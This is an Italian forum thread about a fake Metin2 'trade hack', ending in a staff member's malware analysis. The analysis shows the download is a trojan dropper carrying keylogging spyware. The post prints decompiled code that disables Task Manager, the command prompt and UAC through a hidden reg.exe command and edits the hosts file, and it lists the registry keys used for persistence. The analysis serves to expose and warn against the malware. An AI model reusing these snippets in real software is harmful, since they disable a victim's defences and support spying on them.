TRADE HACK NEW METIN3

[XxDomyx]

Chiedo scusa e so che il primo messaggio è usato per presentarsi ma volevo sapere se questo hack è un keylogger..
EDIT - MALWARE SPYWARE Dal video non sembra ma non si sa mai

 

[.Xero]

Penso non lo sia.

 

[XxDomyx]

Come faccio a capire che non lo sia?non c'è qualche programma x capirlo?

- - - Updated - - -

https://www.virustotal.com/it/file/94f1ef2f7e4de111b536b2d95df04bf4943ab239f1840c92f36ed877b101d431/analysis/1375364109/ che sia keylogger?

 

[.SexyCactus]

Vedrai, rivela dei trojan

 

[XxDomyx]

I trojan non sono keylogger

- - - Updated - - -

Nessuno risponde?D:

 

[uJTora]

22/46 ci sono serie possibilità che sia un keylogger...

Ps: i trade hack non esistono e non esisteranno mai, ora ci sarà il fighettino di turno che dirà "ovvio che esiste ma nessuno lo pubblica", ******* non esiste! tutti i video che vedi su youtube sono fake, fake e fake!

 

[AssassinFan]

Quel video è un fake, non esistono hack del genere

 

[[Dev]DeusEx]

esistono solo per i file server 2007 che poi ormai anche il mio criceto la fixato

 

[uJTora]

esistono solo per i file server 2007 che poi ormai anche il mio criceto la fixato

I file 2007 fanno talmente cagare che la GF li ha dati pubblicamente

 

[Alexander1991kr]

penso che il sura e il war sono la stessa persona, non ci vuole un genio per fare salire il pg ad un livello 50-60 cosi da non dare sospetti

 

[.Xero]

Allloraa, esiste il tradehack per metin2.sg che si vende a 100 euro

- - - Updated - - -

Per metin2 ita non penso ne esista uno però sono sicuro che per l'sg esiste uno che lo vendono a 100 euro lo vende un amico di un mio staffer.

 

[milan11xd]

Avvolte mi pentirei di essere nato solo perchè leggo su sto forum che c'è ancora gente che spera in Trade Hack Hahah

 

[SpeedJack]

Software sottoposto a reversing del codice: Sì tratta di un Malware Bindato: L'eseguibile (.NET) contiene un array di byte che decripta in %APPDATA% sotto il nome di Hack Metin.exe. Questo estrae un altro eseguibile .NET sotto il nome di HackCommercia.exe sempre in %APPDATA%.
Il primo eseguibile è classificabile come Trojan Dropper.
Il secondo eseguibile (Hack Metin.exe), si imposta in avvio automatico modificando le chiavi di registro:

HKU\​S-1-5-21-842925246-1425521274-308236825-500\​Software\​Microsoft\​Windows\​CurrentVersion\​Run

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Fissa inoltre hook su mouse e utilizza GetAsyncKeyState e hook su tastiera per prendere l'input da tastiera. Inoltre prende screen dal monitor, ricava i nomi delle finestre aperte, invia gli screen su bayimg.com, invia gli altri dati tramite email (gmail) e tramite FTP. Ruba log del mouse, della tastiera, della clipboard, immagine su schermo, finestre aperte. Inoltre raccoglie le seguenti informazioni:
Nome utente
Nome Computer
Orario
Versione di Windows
Chiave Seriale di Windows
Memoria fisica disponibile
Memoria virtuale disponibile
Inoltre disabilità il task manager, il prompt dei comandi, e altro usando:

        if (βΕυΜΒ == 2)        {
            MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System ", "DisableTaskMgr", "1");
        }
        if (υΗολψπΛΜ)
        {
            MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun", "1");
        }
        if (ςΝΙαφχπχ)
        {
            MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "1");
        }
        if (ΕηλΓτΕΗΩ)
        {
            MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "2");
        }
        if (ΨνΒΝξτιΛ)
        {
            Interaction.Shell(@"C:\Windows\System32\ΕηλΓτΕΗΩ.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
        }
        if (βδΠΔενΜν)
        {
            MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "2");

Blocca l'accesso a diversi siti modificando il file hosts:

foreach (string str4 in Strings.Split(οδΨωΡ, ",", -1, CompareMethod.Binary))        {
            File.AppendAllText(Environment.GetFolderPath(Environment.SpecialFolder.System) + @"\drivers\etc\hosts", "\r\n127.0.0.1 " + str4);
        }

E molto altro.
Si tratta quindi di un Malware Spyware complesso con funzioni di keylogging.
Il terzo eseguibile, non è altro che un falso hack mal programmato. Si tratta solo di 2 form che fanno finta di fare qualcosa ma in realtà non fanno niente. Si tratta di un diversivo per nascondere il malware.


Un trade hack ha necessariamente bisogno di avere la possibilità di accedere al server di gioco. Un trade hack è perciò illegale (la Legge Italiana prevede anche la carcerazione) e decisamente difficile da produrre: non sperate di poterlo trovare.


Prego di non rilasciare altri malware all'interno delle nostre reti. Inoltre qui ci vanno solo release, niente domande. Chiudo.



Saluti,
SpeedJack
inforge.net Staff